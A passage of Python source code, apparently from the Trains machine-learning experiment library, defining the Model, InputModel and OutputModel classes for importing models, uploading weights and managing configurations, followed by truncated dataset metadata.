config\n if not isinstance(config, dict):\n raise ValueError(\"Model configuration only supports dictionary objects\")\n try:\n try:\n text = HOCONConverter.to_hocon(ConfigFactory.from_dict(config))\n except Exception:\n # fallback json+pyhocon\n # hack, pyhocon is not very good with dict conversion so we pass through json\n import json\n text = json.dumps(config)\n text = HOCONConverter.to_hocon(ConfigFactory.parse_string(text))\n\n except Exception:\n raise ValueError(\"Could not serialize configuration dictionary:\\n{}\".format(config))\n return text\n\n @staticmethod\n def _text_to_config_dict(text):\n if not isinstance(text, six.string_types):\n raise ValueError(\"Model configuration parsing only supports string\")\n try:\n return ConfigFactory.parse_string(text).as_plain_ordered_dict()\n except pyparsing.ParseBaseException as ex:\n pos = \"at char {}, line:{}, col:{}\".format(ex.loc, ex.lineno, ex.column)\n six.raise_from(ValueError(\"Could not parse configuration text ({}):\\n{}\".format(pos, text)), None)\n except Exception:\n six.raise_from(ValueError(\"Could not parse configuration text:\\n{}\".format(text)), None)\n\n @staticmethod\n def _resolve_config(config_text=None, config_dict=None):\n mutually_exclusive(config_text=config_text, config_dict=config_dict, _require_at_least_one=False)\n if config_dict:\n return InputModel._config_dict_to_text(config_dict)\n\n return config_text\n\n\nclass Model(BaseModel):\n \"\"\"\n Represent an existing model in the system, looked up by model id.\n The Model 
will be read-only and can be used to pre-initialize a network.\n \"\"\"\n\n def __init__(self, model_id):\n # type: (str) -> None\n \"\"\"\n Load a model based on its id. The returned object is read-only and can be connected to a task.\n\n Notice that we can override the input model when running remotely.\n\n :param model_id: id (string)\n \"\"\"\n super(Model, self).__init__()\n self._base_model_id = model_id\n self._base_model = None\n\n def get_local_copy(self, extract_archive=True, raise_on_error=False):\n # type: (bool, bool) -> str\n \"\"\"\n Retrieve a valid link to the model file(s).\n If the model URL is a file system link, it will be returned directly.\n If the model URL points to a remote location (http/s3/gs etc.),\n it will download the file(s) and return the temporary location of the downloaded model.\n\n :param bool extract_archive: If True and the model is of type 'packaged' (e.g. a TensorFlow compressed folder),\n the returned path will be a temporary folder containing the archive content\n :param bool raise_on_error: If True and the artifact could not be downloaded,\n raise ValueError, otherwise return None on failure and output log warning.\n :return str: a local path to the model (or a downloaded copy of it)\n \"\"\"\n if extract_archive and self._package_tag in self.tags:\n return self.get_weights_package(return_path=True, raise_on_error=raise_on_error)\n return self.get_weights(raise_on_error=raise_on_error)\n\n def _get_base_model(self):\n if self._base_model:\n return self._base_model\n\n if not self._base_model_id:\n # this shouldn't actually happen\n raise Exception('Missing model ID, cannot create an empty model')\n self._base_model = _Model(\n upload_storage_uri=None,\n cache_dir=get_cache_dir(),\n model_id=self._base_model_id,\n )\n return self._base_model\n\n def _get_model_data(self):\n return self._get_base_model().data\n\n\nclass InputModel(Model):\n \"\"\"\n Load an existing model in the system, looked up by model id.\n The Model will be read-only and can be used to pre-initialize a network.\n We can connect the model to a task as an input model, then override it from the UI when running remotely.\n \"\"\"\n\n _EMPTY_MODEL_ID = _Model._EMPTY_MODEL_ID\n\n @classmethod\n def import_model(\n cls,\n weights_url, # type: str\n config_text=None, # type: Optional[str]\n config_dict=None, # type: Optional[dict]\n label_enumeration=None, # type: Optional[Dict[str, int]]\n name=None, # type: Optional[str]\n tags=None, # type: Optional[List[str]]\n comment=None, # type: Optional[str]\n is_package=False, # type: bool\n create_as_published=False, # type: bool\n framework=None, # type: Optional[str]\n ):\n # type: (...) -> InputModel\n \"\"\"\n Create an InputModel object from a pre-trained model by specifying the URL of an initial weights file.\n Optionally, input a configuration, label enumeration, name for the model, tags describing the model,\n comment as a description of the model, indicate whether the model is a package, specify the model's\n framework, and indicate whether to immediately set the model's status to ``Published``.\n The model is read-only.\n\n The **Trains Server** (backend) may already store the model's URL. 
If the input model's URL is not\n stored, meaning the model is new, then it is imported and Trains stores its metadata.\n If the URL is already stored, the import process stops, Trains issues a warning message, and Trains\n reuses the model.\n\n In your Python experiment script, after importing the model, you can connect it to the main execution\n Task as an input model using :meth:`InputModel.connect` or :meth:`.Task.connect`. That initializes the\n network.\n\n .. note::\n Using the **Trains Web-App** (user interface), you can reuse imported models and switch models in\n experiments.\n\n :param str weights_url: A valid URL for the initial weights file. If the **Trains Server** (backend)\n already stores the metadata of a model with the same URL, that existing model is returned\n and Trains ignores all other parameters.\n\n For example:\n\n - ``https://domain.com/file.bin``\n - ``s3://bucket/file.bin``\n - ``file:///home/user/file.bin``\n\n :param str config_text: The configuration as a string. This is usually the content of a configuration\n dictionary file. Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The configuration as a dictionary. Specify ``config_text`` or ``config_dict``,\n but not both.\n :param dict label_enumeration: Optional label enumeration dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n :param str name: The name of the newly imported model. (Optional)\n :param tags: The list of tags which describe the model. (Optional)\n :type tags: list(str)\n :param str comment: A comment / description for the model. (Optional)\n :type comment: str\n :param is_package: Is the imported weights file a package? (Optional)\n\n - ``True`` - Is a package. Add a package tag to the model.\n - ``False`` - Is not a package. Do not add a package tag. (Default)\n\n :type is_package: bool\n :param bool create_as_published: Set the model's status to Published? (Optional)\n\n - ``True`` - Set the status to Published.\n - ``False`` - Do not set the status to Published. The status will be Draft. (Default)\n\n :param str framework: The framework of the model. (Optional)\n :type framework: str or Framework object\n\n :return: The imported model or existing model (see above).\n \"\"\"\n config_text = cls._resolve_config(config_text=config_text, config_dict=config_dict)\n weights_url = StorageHelper.conform_url(weights_url)\n if not weights_url:\n raise ValueError(\"Please provide a valid weights_url parameter\")\n extra = {'system_tags': [\"-\" + ARCHIVED_TAG]} \\\n if Session.check_min_api_version('2.3') else {'tags': [\"-\" + ARCHIVED_TAG]}\n result = _Model._get_default_session().send(models.GetAllRequest(\n uri=[weights_url],\n only_fields=[\"id\", \"name\", \"created\"],\n **extra\n ))\n\n if result.response.models:\n logger = get_logger()\n\n logger.debug('A model with uri \"{}\" already exists. 
Selecting it'.format(weights_url))\n\n model = get_single_result(\n entity='model',\n query=weights_url,\n results=result.response.models,\n log=logger,\n raise_on_error=False,\n )\n\n logger.info(\"Selected model id: {}\".format(model.id))\n\n return InputModel(model_id=model.id)\n\n base_model = _Model(\n upload_storage_uri=None,\n cache_dir=get_cache_dir(),\n )\n\n from .task import Task\n task = Task.current_task()\n if task:\n comment = 'Imported by task id: {}'.format(task.id) + ('\\n' + comment if comment else '')\n project_id = task.project\n task_id = task.id\n else:\n project_id = None\n task_id = None\n\n if not framework:\n framework, file_ext = Framework._get_file_ext(\n framework=framework,\n filename=weights_url\n )\n\n base_model.update(\n design=config_text,\n labels=label_enumeration,\n name=name,\n comment=comment,\n tags=tags,\n uri=weights_url,\n framework=framework,\n project_id=project_id,\n task_id=task_id,\n )\n\n this_model = InputModel(model_id=base_model.id)\n this_model._base_model = base_model\n\n if is_package:\n this_model._set_package_tag()\n\n if create_as_published:\n this_model.publish()\n\n return this_model\n\n @classmethod\n def load_model(cls, weights_url, load_archived=False):\n # type: (str, bool) -> InputModel\n \"\"\"\n Load an already registered model based on a pre-existing model file (link must be valid).\n\n If the URL of the weights file is already registered, the returned object is a Model representing the loaded model.\n If no registered model with the specified URL can be found, None is returned.\n\n :param weights_url: valid url for the weights file (string).\n examples: \"https://domain.com/file.bin\" or \"s3://bucket/file.bin\" or \"file:///home/user/file.bin\".\n NOTE: if a model with the exact same URL exists, it will be used, and all other arguments will be ignored.\n :param bool load_archived: If True, return the registered Model even if it is archived;\n otherwise, archived models are ignored.\n :return Model: InputModel object or None if no model could be found\n \"\"\"\n weights_url = StorageHelper.conform_url(weights_url)\n if not weights_url:\n raise ValueError(\"Please provide a valid weights_url parameter\")\n if not load_archived:\n extra = {'system_tags': [\"-\" + ARCHIVED_TAG]} \\\n if Session.check_min_api_version('2.3') else {'tags': [\"-\" + ARCHIVED_TAG]}\n else:\n extra = {}\n\n result = _Model._get_default_session().send(models.GetAllRequest(\n uri=[weights_url],\n only_fields=[\"id\", \"name\", \"created\"],\n **extra\n ))\n\n if not result or not result.response or not result.response.models:\n return None\n\n logger = get_logger()\n model = get_single_result(\n entity='model',\n query=weights_url,\n results=result.response.models,\n log=logger,\n raise_on_error=False,\n )\n\n return InputModel(model_id=model.id)\n\n @classmethod\n def empty(cls, config_text=None, config_dict=None, label_enumeration=None):\n # type: (Optional[str], Optional[dict], Optional[Dict[str, int]]) -> InputModel\n \"\"\"\n Create an empty model object. Later, you can assign a model to the empty model object.\n\n :param config_text: The model configuration as a string. This is usually the content of a configuration\n dictionary file. Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The model configuration as a dictionary. 
Specify ``config_text`` or ``config_dict``,\n but not both.\n :param dict label_enumeration: The label enumeration dictionary of string (label) to integer (value) pairs.\n (Optional)\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n \"\"\"\n design = cls._resolve_config(config_text=config_text, config_dict=config_dict)\n\n this_model = InputModel(model_id=cls._EMPTY_MODEL_ID)\n this_model._base_model = m = _Model(\n cache_dir=None,\n upload_storage_uri=None,\n model_id=cls._EMPTY_MODEL_ID,\n )\n m._data.design = _Model._wrap_design(design)\n m._data.labels = label_enumeration\n return this_model\n\n def __init__(self, model_id):\n # type: (str) -> None\n \"\"\"\n :param str model_id: The Trains Id (system UUID) of the input model whose metadata the **Trains Server**\n (backend) stores.\n \"\"\"\n super(InputModel, self).__init__(model_id)\n\n @property\n def id(self):\n # type: () -> str\n return self._base_model_id\n\n def connect(self, task):\n # type: (Task) -> None\n \"\"\"\n Connect the current model to a Task object, if the model is preexisting. Preexisting models include:\n\n - Imported models (InputModel objects created using the :meth:`InputModel.import_model` method).\n - Models whose metadata is already in the Trains platform, meaning the InputModel object is instantiated\n from the ``InputModel`` class specifying the model's Trains Id as an argument.\n - Models whose origin is not Trains that are used to create an InputModel object. For example,\n models created using TensorFlow.\n\n When the experiment is executed remotely in a worker, the input model already specified in the experiment is\n used.\n\n .. note::\n The **Trains Web-App** allows you to switch one input model for another and then enqueue the experiment\n to execute in a worker.\n\n :param object task: A Task object.\n \"\"\"\n self._set_task(task)\n\n if running_remotely() and task.input_model and task.is_main_task():\n self._base_model = task.input_model\n self._base_model_id = task.input_model.id\n else:\n # we should set the task input model to point to us\n model = self._get_base_model()\n # try to store the input model id, if it is not empty\n if model.id != self._EMPTY_MODEL_ID:\n task.set_input_model(model_id=model.id)\n # only copy the model design if the task has no design to begin with\n if not self._task._get_model_config_text():\n task._set_model_config(config_text=model.model_design)\n if not self._task.get_labels_enumeration():\n task.set_model_label_enumeration(model.data.labels)\n\n # If there was an output model connected, it may need to be updated by\n # the newly connected input model\n self.task._reconnect_output_model()\n\n\nclass OutputModel(BaseModel):\n \"\"\"\n Create an output model for a Task (experiment) to store the training results.\n\n The OutputModel object is always connected to a Task object, because it is instantiated with a Task object\n as an argument. It is, therefore, automatically registered as the Task's (experiment's) output model.\n\n The OutputModel object is read-write.\n\n A common use case is to reuse the OutputModel object, and override the weights after storing a model snapshot.\n Another use case is to create multiple OutputModel objects for a Task (experiment), and after a new high score\n is found, store a model snapshot.\n\n If the model configuration and / or the model's label enumeration\n are ``None``, then the output model is initialized with the values from the Task object's input model.\n\n .. 
note::\n When executing a Task (experiment) remotely in a worker, you can modify the model configuration and / or model's\n label enumeration using the **Trains Web-App**.\n \"\"\"\n\n @property\n def published(self):\n # type: () -> bool\n \"\"\"\n Get the published state of this model.\n\n :return bool: ``True`` if the model is published, ``False`` otherwise.\n \"\"\"\n if not self.id:\n return False\n return self._get_base_model().locked\n\n @property\n def config_text(self):\n # type: () -> str\n \"\"\"\n Get the configuration as a string. For example, prototxt, an ini file, or Python code to evaluate.\n\n :return str: The configuration.\n \"\"\"\n return _Model._unwrap_design(self._get_model_data().design)\n\n @config_text.setter\n def config_text(self, value):\n # type: (str) -> None\n \"\"\"\n Set the configuration. Store a blob of text for custom usage.\n \"\"\"\n self.update_design(config_text=value)\n\n @property\n def config_dict(self):\n # type: () -> dict\n \"\"\"\n Get the configuration as a dictionary parsed from the ``config_text`` text. This usually represents the model\n configuration. For example, prototxt, an ini file, or Python code to evaluate.\n\n :return dict: The configuration.\n \"\"\"\n return self._text_to_config_dict(self.config_text)\n\n @config_dict.setter\n def config_dict(self, value):\n # type: (dict) -> None\n \"\"\"\n Set the configuration. Saved in the model object.\n\n :param dict value: The configuration parameters.\n \"\"\"\n self.update_design(config_dict=value)\n\n @property\n def labels(self):\n # type: () -> Dict[str, int]\n \"\"\"\n Get the label enumeration as a dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n :return dict: The label enumeration.\n \"\"\"\n return self._get_model_data().labels\n\n @labels.setter\n def labels(self, value):\n # type: (Dict[str, int]) -> None\n \"\"\"\n Set the label enumeration.\n\n :param dict value: The label enumeration dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n \"\"\"\n self.update_labels(labels=value)\n\n @property\n def upload_storage_uri(self):\n # type: () -> str\n return self._get_base_model().upload_storage_uri\n\n def __init__(\n self,\n task=None, # type: Optional[Task]\n config_text=None, # type: Optional[str]\n config_dict=None, # type: Optional[dict]\n label_enumeration=None, # type: Optional[Dict[str, int]]\n name=None, # type: Optional[str]\n tags=None, # type: Optional[List[str]]\n comment=None, # type: Optional[str]\n framework=None, # type: Optional[Union[str, Framework]]\n base_model_id=None, # type: Optional[str]\n ):\n \"\"\"\n Create a new model and immediately connect it to a task.\n\n We do not allow Model creation without a task, so we always keep track of how we created the models.\n In remote execution, Model parameters can be overridden by the Task\n (such as the model configuration & label enumeration)\n\n :param task: The Task object with which the OutputModel object is associated.\n :type task: Task\n :param config_text: The configuration as a string. This is usually the content of a configuration\n dictionary file. 
Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The configuration as a dictionary.\n Specify ``config_dict`` or ``config_text``, but not both.\n :param dict label_enumeration: The label enumeration dictionary of string (label) to integer (value) pairs.\n (Optional)\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n :param str name: The name for the newly created model. (Optional)\n :param list(str) tags: A list of strings which are tags for the model. (Optional)\n :param str comment: A comment / description for the model. (Optional)\n :param framework: The framework of the model or a Framework object. (Optional)\n :type framework: str or Framework object\n :param base_model_id: optional, model id to be reused\n \"\"\"\n if not task:\n from .task import Task\n task = Task.current_task()\n if not task:\n raise ValueError(\"task object was not provided, and no current task was found\")\n\n super(OutputModel, self).__init__(task=task)\n\n config_text = self._resolve_config(config_text=config_text, config_dict=config_dict)\n\n self._model_local_filename = None\n self._base_model = None\n self._floating_data = create_dummy_model(\n design=_Model._wrap_design(config_text),\n labels=label_enumeration or task.get_labels_enumeration(),\n name=name,\n tags=tags,\n comment='{} by task id: {}'.format('Created' if not base_model_id else 'Overwritten', task.id) +\n ('\\n' + comment if comment else ''),\n framework=framework,\n upload_storage_uri=task.output_uri,\n )\n if base_model_id:\n try:\n _base_model = InputModel(base_model_id)._get_base_model()\n _base_model.update(\n labels=self._floating_data.labels,\n design=self._floating_data.design,\n task_id=self._task.id,\n project_id=self._task.project,\n name=self._floating_data.name or task.name,\n comment=('{}\\n{}'.format(_base_model.comment, self._floating_data.comment)\n if _base_model.comment and self._floating_data.comment else\n (_base_model.comment or self._floating_data.comment)),\n tags=self._floating_data.tags,\n framework=self._floating_data.framework,\n upload_storage_uri=self._floating_data.upload_storage_uri\n )\n self._base_model = _base_model\n self._floating_data = None\n self._base_model.update_for_task(task_id=self._task.id, override_model_id=self.id)\n except Exception:\n pass\n self.connect(task)\n\n def connect(self, task):\n # type: (Task) -> None\n \"\"\"\n Connect the current model to a Task object, if the model is a preexisting model. 
Preexisting models include:\n\n - Imported models.\n - Models whose metadata the **Trains Server** (backend) is already storing.\n - Models from another source, such as frameworks like TensorFlow.\n\n :param object task: A Task object.\n \"\"\"\n if self._task != task:\n raise ValueError('Can only connect preexisting model to task, but this is a fresh model')\n\n if running_remotely() and task.is_main_task():\n if self._floating_data:\n self._floating_data.design = _Model._wrap_design(self._task._get_model_config_text()) or \\\n self._floating_data.design\n self._floating_data.labels = self._task.get_labels_enumeration() or \\\n self._floating_data.labels\n elif self._base_model:\n self._base_model.update(design=_Model._wrap_design(self._task._get_model_config_text()) or\n self._base_model.design)\n self._base_model.update(labels=self._task.get_labels_enumeration() or self._base_model.labels)\n\n elif self._floating_data is not None:\n # we copy configuration / labels if they exist, obviously someone wants them as the output base model\n if _Model._unwrap_design(self._floating_data.design):\n if not task._get_model_config_text():\n task._set_model_config(config_text=self._floating_data.design)\n else:\n self._floating_data.design = _Model._wrap_design(self._task._get_model_config_text())\n\n if self._floating_data.labels:\n task.set_model_label_enumeration(self._floating_data.labels)\n else:\n self._floating_data.labels = self._task.get_labels_enumeration()\n\n self.task._save_output_model(self)\n\n def set_upload_destination(self, uri):\n # type: (str) -> None\n \"\"\"\n Set the URI of the storage destination for uploaded model weight files.\n Supported storage destinations include S3, Google Cloud Storage, and file locations.\n\n Using this method, file uploads are performed separately, and a link to each upload is stored in the model object.\n\n .. note::\n For storage requiring credentials, the credentials are stored in the Trains configuration file,\n ``~/trains.conf``.\n\n :param str uri: The URI of the upload storage destination.\n\n For example:\n\n - ``s3://bucket/directory/``\n - ``file:///tmp/debug/``\n\n :return bool: The status of whether the storage destination scheme is supported.\n\n - ``True`` - The storage destination scheme is supported.\n - ``False`` - The storage destination scheme is not supported.\n \"\"\"\n if not uri:\n return\n\n # Test if we can update the model.\n self._validate_update()\n\n # Create the storage helper\n storage = StorageHelper.get(uri)\n\n # Verify that we can upload to this destination\n try:\n uri = storage.verify_upload(folder_uri=uri)\n except Exception:\n raise ValueError(\"Could not set destination uri to: %s [Check write permissions]\" % uri)\n\n # store default uri\n self._get_base_model().upload_storage_uri = uri\n\n def update_weights(\n self,\n weights_filename=None, # type: Optional[str]\n upload_uri=None, # type: Optional[str]\n target_filename=None, # type: Optional[str]\n auto_delete_file=True, # type: bool\n register_uri=None, # type: Optional[str]\n iteration=None, # type: Optional[int]\n update_comment=True # type: bool\n ):\n # type: (...) -> str\n \"\"\"\n Update the model weights from a locally stored model filename.\n\n .. note::\n Uploading the model is a background process. 
A call to this method returns immediately.\n\n :param str weights_filename: The name of the locally stored weights file to upload.\n Specify ``weights_filename`` or ``register_uri``, but not both.\n :param str upload_uri: The URI of the storage destination for model weights upload. The default value\n is the previously used URI. (Optional)\n :param str target_filename: The newly created filename in the storage destination location. The default value\n is the ``weights_filename`` value. (Optional)\n :param bool auto_delete_file: Delete the temporary file after uploading? (Optional)\n\n - ``True`` - Delete (Default)\n - ``False`` - Do not delete\n\n :param str register_uri: The URI of an already uploaded weights file. The URI must be valid. Specify\n ``register_uri`` or ``weights_filename``, but not both.\n :param int iteration: The iteration number.\n :param bool update_comment: Update the model comment with the local weights file name (to maintain\n provenance)? (Optional)\n\n - ``True`` - Update model comment (Default)\n - ``False`` - Do not update\n\n :return str: The uploaded URI.\n \"\"\"\n\n def delete_previous_weights_file(filename=weights_filename):\n try:\n if filename:\n os.remove(filename)\n except OSError:\n self._log.debug('Failed removing temporary file %s' % filename)\n\n # test if we can update the model\n if self.id and self.published:\n raise ValueError('Model is published and cannot be changed')\n\n if (not weights_filename and not register_uri) or (weights_filename and register_uri):\n raise ValueError('Model update must have either local weights file to upload, '\n 'or pre-uploaded register_uri, never both')\n\n # only upload if we are connected to a task\n if not self._task:\n raise Exception('Missing a task for this model')\n\n if weights_filename is not None:\n # make sure we delete the previous file, if it exists\n if self._model_local_filename != weights_filename:\n delete_previous_weights_file(self._model_local_filename)\n # store temp filename for deletion next time, if needed\n if auto_delete_file:\n self._model_local_filename = weights_filename\n\n # make sure the created model is updated:\n model = self._get_force_base_model()\n if not model:\n raise ValueError('Failed creating internal output model')\n\n # select the correct file extension based on the framework,\n # or update the framework based on the file extension\n framework, file_ext = Framework._get_file_ext(\n framework=self._get_model_data().framework,\n filename=target_filename or weights_filename or register_uri\n )\n\n if weights_filename:\n target_filename = target_filename or Path(weights_filename).name\n if not target_filename.lower().endswith(file_ext):\n target_filename += file_ext\n\n # set target uri for upload (if specified)\n if upload_uri:\n self.set_upload_destination(upload_uri)\n\n # let us know the iteration number, we put it in the comment section for now.\n if update_comment:\n comment = self.comment or ''\n iteration_msg = 'snapshot {} stored'.format(weights_filename or register_uri)\n if not comment.startswith('\\n'):\n comment = '\\n' + comment\n comment = iteration_msg + comment\n else:\n comment = None\n\n # if we have no output destination, just register the local model file\n if weights_filename and not self.upload_storage_uri and not self._task.storage_uri:\n register_uri = weights_filename\n weights_filename = None\n auto_delete_file = False\n self._log.info('No output storage destination defined, registering local model %s' % register_uri)\n\n # start the upload\n if 
weights_filename:\n if not model.upload_storage_uri:\n self.set_upload_destination(self.upload_storage_uri or self._task.storage_uri)\n\n output_uri = model.update_and_upload(\n model_file=weights_filename,\n task_id=self._task.id,\n async_enable=True,\n target_filename=target_filename,\n framework=self.framework or framework,\n comment=comment,\n cb=delete_previous_weights_file if auto_delete_file else None,\n iteration=iteration or self._task.get_last_iteration(),\n )\n elif register_uri:\n register_uri = StorageHelper.conform_url(register_uri)\n output_uri = model.update(uri=register_uri, task_id=self._task.id, framework=framework, comment=comment)\n else:\n output_uri = None\n\n # make sure that if we are in dev mode we report that we are training (not debugging)\n self._task._output_model_updated()\n\n return output_uri\n\n def update_weights_package(\n self,\n weights_filenames=None, # type: Optional[Sequence[str]]\n weights_path=None, # type: Optional[str]\n upload_uri=None, # type: Optional[str]\n target_filename=None, # type: Optional[str]\n auto_delete_file=True, # type: bool\n iteration=None # type: Optional[int]\n ):\n # type: (...) -> str\n \"\"\"\n Update the model weights from locally stored model files, or from a directory containing multiple files.\n\n .. note::\n Uploading the model weights is a background process. A call to this method returns immediately.\n\n :param weights_filenames: The file names of the locally stored model files. Specify ``weights_filenames``\n or ``weights_path``, but not both.\n :type weights_filenames: list(str)\n :param weights_path: The directory path to a package. All the files in the directory will be uploaded.\n Specify ``weights_path`` or ``weights_filenames``, but not both.\n :type weights_path: str\n :param str upload_uri: The URI of the storage destination for the model weights upload. The default\n is the previously used URI. (Optional)\n :param str target_filename: The newly created filename in the storage destination URI location. The default\n is the value specified in the ``weights_filename`` parameter. (Optional)\n :param bool auto_delete_file: Delete temporary file after uploading? 
(Optional)\n\n - ``True`` - Delete (Default)\n - ``False`` - Do not delete\n\n :param int iteration: The iteration number.\n\n :return str: The uploaded URI for the weights package.\n \"\"\"\n # create list of files\n if (not weights_filenames and not weights_path) or (weights_filenames and weights_path):\n raise ValueError('Model update weights package should get either '\n 'directory path to pack or a list of files')\n\n if not weights_filenames:\n weights_filenames = list(map(six.text_type, Path(weights_path).rglob('*')))\n\n # create packed model from all the files\n fd, zip_file = mkstemp(prefix='model_package.', suffix='.zip')\n try:\n with zipfile.ZipFile(zip_file, 'w', allowZip64=True, compression=zipfile.ZIP_STORED) as zf:\n for filename in weights_filenames:\n zf.write(filename, arcname=Path(filename).name)\n finally:\n os.close(fd)\n\n # now we can delete the files (or path if provided)\n if auto_delete_file:\n def safe_remove(path, is_dir=False):\n try:\n (os.rmdir if is_dir else os.remove)(path)\n except OSError:\n self._log.info('Failed removing temporary {}'.format(path))\n\n for filename in weights_filenames:\n safe_remove(filename)\n if weights_path:\n safe_remove(weights_path, is_dir=True)\n\n if target_filename and not target_filename.lower().endswith('.zip'):\n target_filename += '.zip'\n\n # and now we should upload the file, always delete the temporary zip file\n comment = self.comment or ''\n iteration_msg = 'snapshot {} stored'.format(str(weights_filenames))\n if not comment.startswith('\\n'):\n comment = '\\n' + comment\n comment = iteration_msg + comment\n self.comment = comment\n uploaded_uri = self.update_weights(weights_filename=zip_file, auto_delete_file=True, upload_uri=upload_uri,\n target_filename=target_filename or 'model_package.zip',\n iteration=iteration, update_comment=False)\n # set the model tag (by now we should have a model object) so we know we have packaged file\n self._set_package_tag()\n return uploaded_uri\n\n def update_design(self, config_text=None, config_dict=None):\n # type: (Optional[str], Optional[dict]) -> bool\n \"\"\"\n Update the model configuration. Store a blob of text for custom usage.\n\n .. note::\n This method's behavior is lazy. The design update is only forced when the weights\n are updated.\n\n :param config_text: The configuration as a string. This is usually the content of a configuration\n dictionary file. Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The configuration as a dictionary. 
Specify ``config_text`` or ``config_dict``,\n but not both.\n\n :return bool: The status of the update.\n\n - ``True`` - Update successful.\n - ``False`` - Update not successful.\n \"\"\"\n if not self._validate_update():\n return False\n\n config_text = self._resolve_config(config_text=config_text, config_dict=config_dict)\n\n if self._task and not self._task.get_model_config_text():\n self._task.set_model_config(config_text=config_text)\n\n if self.id:\n # update the model object (this will happen if we resumed a training task)\n result = self._get_force_base_model().edit(design=config_text)\n else:\n self._floating_data.design = _Model._wrap_design(config_text)\n result = Waitable()\n\n # you can wait on this object\n return result\n\n def update_labels(self, labels):\n # type: (Dict[str, int]) -> Optional[Waitable]\n \"\"\"\n Update the label enumeration.\n\n :param dict labels: The label enumeration dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n :return:\n \"\"\"\n validate_dict(labels, key_types=six.string_types, value_types=six.integer_types, desc='label enumeration')\n\n if not self._validate_update():\n return\n\n if self._task:\n self._task.set_model_label_enumeration(labels)\n\n if self.id:\n # update the model object (this will happen if we resumed a training task)\n result = self._get_force_base_model().edit(labels=labels)\n else:\n self._floating_data.labels = labels\n result = Waitable()\n\n # you can wait on this object\n return result\n\n @classmethod\n def wait_for_uploads(cls, timeout=None, max_num_uploads=None):\n # type: (Optional[float], Optional[int]) -> None\n \"\"\"\n Wait for any pending or in-progress model uploads to complete. If no uploads are pending or in-progress,\n then the ``wait_for_uploads`` returns immediately.\n\n :param float timeout: The timeout interval to wait for uploads (seconds). (Optional).\n :param int max_num_uploads: The maximum number of uploads to wait for. 
(Optional).\n \"\"\"\n _Model.wait_for_results(timeout=timeout, max_num_uploads=max_num_uploads)\n\n def _get_force_base_model(self):\n if self._base_model:\n return self._base_model\n\n # create a new model from the task\n self._base_model = self._task.create_output_model()\n # update the model from the task inputs\n labels = self._task.get_labels_enumeration()\n config_text = self._task._get_model_config_text()\n parent = self._task.output_model_id or self._task.input_model_id\n self._base_model.update(\n labels=self._floating_data.labels or labels,\n design=self._floating_data.design or config_text,\n task_id=self._task.id,\n project_id=self._task.project,\n parent_id=parent,\n name=self._floating_data.name or self._task.name,\n comment=self._floating_data.comment,\n tags=self._floating_data.tags,\n framework=self._floating_data.framework,\n upload_storage_uri=self._floating_data.upload_storage_uri\n )\n\n # remove model floating change set, by now they should have matched the task.\n self._floating_data = None\n\n # now we have to update the creator task so it points to us\n if self._task.status not in (self._task.TaskStatusEnum.created, self._task.TaskStatusEnum.in_progress):\n self._log.warning('Could not update last created model in Task {}, '\n 'Task status \\'{}\\' cannot be updated'.format(self._task.id, self._task.status))\n else:\n self._base_model.update_for_task(task_id=self._task.id, override_model_id=self.id)\n\n return self._base_model\n\n def _get_base_model(self):\n if self._floating_data:\n return self._floating_data\n return self._get_force_base_model()\n\n def _get_model_data(self):\n if self._base_model:\n return self._base_model.data\n return self._floating_data\n\n def _validate_update(self):\n # test if we can update the model\n if self.id and self.published:\n raise ValueError('Model is published and cannot be changed')\n\n return True\n\n\nclass Waitable(object):\n def wait(self, *_, **__):\n return True\n", "sub_path": "trains/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 52825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 25, "usage_type": "name"}, {"api_name": "utilities.enum.Options", "line_number": 31, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._unwrap_design", "line_number": 186, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 186, "usage_type": "name"}, {"api_name": "debugging.log.get_logger", "line_number": 243, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 284, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 288, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 288, "usage_type": "attribute"}, {"api_name": "zipfile.BadZipfile", "line_number": 293, "usage_type": "attribute"}, {"api_name": "tarfile.ReadError", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pathlib2.Path", "line_number": 301, "usage_type": "call"}, {"api_name": "config.running_remotely", "line_number": 316, "usage_type": "call"}, {"api_name": "backend_interface.Task", "line_number": 320, "usage_type": "argument"}, {"api_name": "abc.abstractmethod", "line_number": 324, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 328, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 340, "usage_type": "attribute"}, {"api_name": 
